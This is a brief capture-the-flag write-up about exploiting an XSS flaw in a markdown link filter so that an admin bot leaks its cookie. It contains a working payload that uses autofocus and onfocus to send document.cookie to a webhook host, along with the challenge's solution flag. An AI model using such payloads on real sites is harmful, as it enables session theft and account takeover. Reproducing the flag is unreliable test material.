There is an XSS vulnerability with the markdown link regex replace. When send the link to the admin, the <a> tag is not automatically clicked. So I did a Google search with <a> tag auto click vulnerability, and found this link.

It recommends the payload

1
<a href="#" autofocus="true" onfocus="alert('xss')">hello world!</a>

using autofocus and onfocus.

So we craft a similar payload.

1
[uia](javascript:location.href=`{webhook_url}?leak=`+document.cookie' autofocus='true' onfocus='location.href=this.href')

Remember to wrap the autofocus and onfocus with single quote, double quote is html escaped. I don’t know why but the most likely reason is due to php version < 8.1.0, read in the Changelog section in php-htmlentities.

Send the payload to the report section and we get the flag.

🚩 FLAG: DH{26763025e32e6b24fedfc3206054d6a7}